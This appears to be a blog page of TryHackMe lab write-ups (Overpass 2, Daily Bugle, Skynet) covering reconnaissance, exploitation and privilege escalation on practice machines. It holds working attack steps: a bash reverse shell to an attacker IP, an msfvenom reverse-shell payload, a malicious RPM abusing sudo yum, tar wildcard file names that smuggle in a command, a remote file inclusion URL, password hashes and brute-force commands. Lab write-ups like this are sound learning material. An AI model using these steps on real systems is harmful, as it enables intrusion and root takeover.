Skip to content

Month: July 2021

THM – Overpass 2

Published by Bobby Lin on July 4, 2021

Gaining Foothold

ssh james@[TARGET IP] -p 2222
Password: november16

Privilege Escalation

Option 1: Sudo

I tried to sudo but the credentials for James doesn’t work.

Password: whenevernoteartinstant

Previously I have cracked the password for these users but the credentials does not work as well

james:$6$7GS5e.yv$HqIH5MthpGWpczr3MnwDHlED8gbVSHt7ma8yxzBM8LuBReDV5e1Pu/VuRskugt1Ckul/SKGX.5PyMpzAYo3Cg/:18464:0:99999:7:::
paradox:$6$oRXQu43X$WaAj3Z/4sEPV1mJdHsyJkIZm1rjjnNxrY5c8GElJIjG7u36xSgMGwKA2woDIFudtyqY37YCyukiHJPhi4IU7H0:18464:0:99999:7:::
szymex:$6$B.EnuXiO$f/u00HosZIO3UQCEJplazoQtH8WJjSX/ooBjwmYfEOTcqCAlMjeFIgYWqR5Aj2vsfRyf6x1wXxKitcPUjcXlX/:18464:0:99999:7:::
bee:$6$.SqHrp6z$B4rWPi0Hkj0gbQMFujz1KHVs9VrSFu7AU9CxWrZV7GzH05tYPL1xRzUJlFHbyp0K9TAeY1M6niFseB9VLBWSo0:18464:0:99999:7:::
muirland:$6$SWybS8o2$9diveQinxy8PJQnGQQWbTNKeb2AiSp.i8KznuAjYbqI3q04Rf5hjHPer3weiC.2MrOj2o1Sw/fd2cu0kC6dUP.:18464:0:99999:7:::

Option 2: SUID

I tried to find the SUID binaries. There is one uncommon binary in /home/james/.suid_bash When I execute the binary, there is a bash running but the user was still james. But we can elevate the privilege but running with -p

That’s how we get the root user.

THM – Daily Bungle

Published by Bobby Lin on July 2, 2021
Amazing Spider-Man: The Daily Bugle (2020) #2 | Comic Issues | Marvel

Lab Stats

Time: 6 hours

Hint taken: 0

Difficulty: Hard

Recon

I accessed the web server. This is a blog-like application showing an item that “Spider-man” rob the bank.

Looking at the HTML, it shows that Joomla! is being used.

At first look, I am trying to find the Joomla! version in the web pages – but does not seems to have the info.

I googled for more information and found out that we can see the Joomla! version by looking at the language.

https://www.itoctopus.com/how-to-quickly-know-the-version-of-any-joomla-website

Web Enumeration

Navigate to robots.txt

I tried navigating all the directories in robots.txt. The /administrator was promising because it shows an admin panel.

But I need to find the credentials for Super User first.

Network scanning

  • ssh (22)
  • http (80)
  • mysql (3306)

It seems like the main attack vectors are the web server and database.

Gaining Foothold (1)

I tried a few SQL Injection payload in user login feature. But it does not work.

So I googled for exploit for Joomla! 3.7.0

https://raw.githubusercontent.com/NinjaJc01/joomblah-3/master/joomblah.py

Note: This requires python2

Found table:', 'fb9j5_users') Found user', ['811', 'Super User', 'jonah', 'jonah@tryhackme.com', '$2y$10$0veO/JSFh4389Lluc4Xya.dfy2MF.bZhz0jVMw.V.d3p12kBtZutm', '', '']) (' - Extracting sessions from', 'fb9j5_session')

I will need to crack the password. First, I try to see what is the hash algorithm used for the password using online hash identifier (https://hashes.com/en/tools/hash_identifier)

I tried to use john to crack the password:
john --format=bcrypt --wordlist=/usr/share/wordlists/rockyou.txt jonah.txt

So the password is spiderman123

I login on as jonah in the admin panel.

Getting Reverse Shell from Joomla!

This took more time.

After googling, I discover that we can change the index.php file in the template to php reverse shell.

Joomla: Reverse Shell

Gaining Foothold (2)

I struggle to find the user flag manually. So I decided to run some Linux Enumeration scripts.

I used python command to spawn:
python -c 'import pty; pty.spawn("/bin/sh")'

Mistakes

I went through my Linux PE checklist and none of the checks is working.

I saw we have an account:

  • jjameson:x:1000:1000:Jonah Jameson:/home/jjameson:/bin/bash

In addition, I tried to check a few things:

  • Trying all the SUID binaries to see if I can escalate privileges -> Doesn’t work
  • Looking for Kernel Exploits -> Doesn’t work

Then during the linpeas enumeration, I saw a database password was discovered.

  • Test if mysql has any exploit and whether it is running as root -> Doesn’t work
    • I tried to login as root: mysql -u root -p -D joomla
    • But there are nothing useful there.
  • I tried looking for Linux exploits and sudo exploits -> Doesn’t work
  • No progress. I am going to login as jjameson in SSH. I tried bruteforcing but it does not work.

How I realize my mistakes?

At this point, I have not made any progress other than finding the database password.

MYSQL Password
user: root
pw: nv5uz9r3ZEDzVjNu

So I read through the checklist of other hackers.

This helps alot: https://sushant747.gitbooks.io/total-oscp-guide/content/privilege_escalation_-_linux.html

I realized my mistake. I should check if the discovered passwords are being reused for SSH and not rely on brute-forcing only.

SSH – Login Checks Methodology

  1. Check if whether the known passwords are reused? Do this for every new password discovered during enumeration
  2. If not, then try to bruteforce.

I took 4 hours to figure out that the database password is reused as jjameson ssh password.

Privilege Escalation

Now I can login as jjameson.

The first thing I do is to run sudo -l

I saw that this account can run sudo yum.

Yum PE

Good article: https://medium.com/@klockw3rk/privilege-escalation-how-to-build-rpm-payloads-in-kali-linux-3a61ef61e8b2

First I need to install fpm and rpm.

git clone https://github.com/jordansissel/fpm
cd fpm
sudo gem install fpm
sudo apt-get install rpm

Then create a root.sh file with the payload:

#!/bin/bash

bash -i >& /dev/tcp/[ATTACKER IP]/3333 0>&1

Then create the package with root.sh:

fpm -n root -s dir -t rpm -a all --before-install root.sh .

Start a nc listener at port 3333.

Download the package in the target machine and install:

sudo yum localinstall -y [package name].rpm

In the listener, we will receive connection as root user.

THM- SkyNet

Published by Bobby Lin on July 1, 2021

Recon

Network Enum

I ran a nmap scan on the target machine.

  • ssh (22): Worth exploring
  • http (80): Web server is running
  • pop (110): Maybe an email server is running?
  • netbios-ssn (139): Worth exploring
  • imap (143): Maybe an email server is running?
  • microsoft-ds (445): SMB is worth exploring

Web Enum

I ran gobuster to spider the directory in the web server

gobuster dir -u http://10.10.134.0:80/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -t 40

From the scan result, I see these are directories found:

  • /admin
  • /css
  • /js
  • /config
  • /ai
  • /squirrelmail (this will be interesting to explore)

Most of the directories are restricted.

The squirrelmail page is working but I will need the login credentials.

I don’t have the credentials at the moment. So now the goal is to find out the email credential.

Service Enum

Now I am going to look at the SMB service running at port 445.

I ran the command to connect to the SMB’s anonymous share

smbclient //[TARGET IP]/anonymous

The files look promising to find a clue on how to get the email credentials.

I ran another command to get the content of the SMB share:

smbget -R smb://[TARGET IP]/anonymous

After inspecting the content, I found a list of possible passwords (maybe they belong to Miles?).

Using Burp Intruder, I brute-force the password with username (milesdyson).

Eventually, the password for milesdyson is cyborg007haloterminator

Once I login as milesdyson, I saw a bunch of emails. After reading one of the email, I saw that the SMB password for milesdyson was leaked.

To summarize, these are the found credentials:

Username: milesdyson

Email Password: cyborg007haloterminator

SMB Password: )s{A&2Z=F^n_E.B`

I tried to connect to the SMB milesdyson share with the username and password:

smbclient //[TARGET IP]/milesdyson -U=milesdyson

Then I manage to login to milesdyson share.

At first glance, most of the files are some machine learning pdf.

I went into the notes folder. There are a bunch of markdowns.

But I spotted a textfile named as “important.txt”.

Inside this important.txt file, I saw that milesdyson have a custom CMS with the link “

Spider the directory in the CMS.

Initially I had an issue because I didn’t put the backslash for the URL.

After I have done so, I ran this command:

gobuster dir -u http://10.10.134.0:80/45kra24zxs28v3yd/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -t 40

  • /administrator was found.

Navigate to this directory and I can see a CMS named “Cuppa CMS”.

Foothold

To summarize, I found three possible ways to gain a foothold into the system.

  • ssh
  • squirrelmail
  • Cuppa CMS

ssh

I tried to brute-force using hydra with username

hydra -l milesdyson -P /usr/share/wordlists/SecLists/Passwords/Common-Credentials/10-million-password-list-top-500.txt [TARGET IP] ssh

But this does not work.

Squirrelmail

I searched for possible exploits for squirrelmail (version 1.4.23).

There is an interesting exploit for RCE.

https://legalhackers.com/advisories/SquirrelMail-Exploit-Remote-Code-Exec-CVE-2017-7692-Vuln.html

I followed the steps but the exploit does not work.

Cuppa CMS

I struggle to find the credentials to login to Cuppa CMS (tried with milesdyson credentials to see if password is reused).

I searched for Cuppa CMS exploit and this seems promising

https://www.exploit-db.com/exploits/25971

Basically, we can call a remote file without login to Cuppa CMS.

The examples given in the exploit

http://target/cuppa/alerts/alertConfigField.php?urlConfig=http://www.shell.com/shell.txt?
http://target/cuppa/alerts/alertConfigField.php?urlConfig=../../../../../../../../../etc/passwd

Now I started a python server so that the CMS can call my shell files.

I tried a few ways to execute a shell.

For example, a basic php web shell with CMD param. But this does not work.

I look for more information about the configuration file.

http://10.10.134.0/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=php://filter/convert.base64-encode/resource=../Configuration.php

It seems like there is a file extension restriction. For example, txt and jpeg are allowed. But php is not allowed.

I tried to create a php reverse shell and then change the magic number of the file to jpeg using hexeditor. This will make the Linux machine interpret the file as a jpeg file.

I started the nc listener.

I ran the command to call the php reverse shell:
http://10.10.134.0/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=http://10.4.3.145:8889/php-reverse-shell.php

This works and I have shell to the machine.

Immediately I enter the id and whoami command to check what is this account.

This account is “www-data”

I can also find the usr flag in milesdyson home directory

Now I gained a foothold, I will need to escalate privilege.

Privilege Escalation

I tried to use sudo but there is an error. It seems like the shell is “jailed”.

Basically we need to spawn a tty shell. (Link: https://netsec.ws/?p=337)

I used python command to spawn:
python -c 'import pty; pty.spawn("/bin/sh")'

Now I can sudo but this seems useless since I don’t know the password of the current user “www-data user”.

Then I ran some Linux enumeration scripts (lse.sh and LinEnum.sh).

It seems like the possible vectors are the crontab and the suid binaries.

I tried with the suid binaries and struggled because of the sudo issue where I don’t know the password. So much time wasted here

So I looked at the crontab. It seems like there is a backup.sh job executed by the root user.

I looked at the content of backup.sh:

#!/bin/bash
cd /var/www/html
tar cf /home/milesdyson/backups/backup.tgz *

So the root user cd into /var/www/html and then perform a backup.

Well I think I am in control of the /var/www/html folder.

I looked at the Linux PE checklist again and found a similar attack vector with the use of wildcard in tar.

https://app.gitbook.com/@bobbylin/s/oscp-playbook/privilege-escalation/linux-privesc#wildcards

I should follow the exact steps. I observed that I miss out one step.

I created two files:

touch /home/user/--checkpoint=1 
touch /home/user/--checkpoint-action=exec=shell.elf

Then I created the shell.elf in attacker machine and download in target machine.
msfvenom -p linux/x64/shell_reverse_tcp LHOST=[ATTACKER IP] LPORT=3333 -f elf -o shell.elf

Now I started the listener at the correct port and wait.

After a few minutes, there are no connection from target machine.

This is when I took a hint and saw that there is something wrong with my shell file

I changed the command to:

touch "/home/user/--checkpoint-action=exec=sh shell.elf"

This works and I managed to connect as root.

Look for the root.txt under root directories.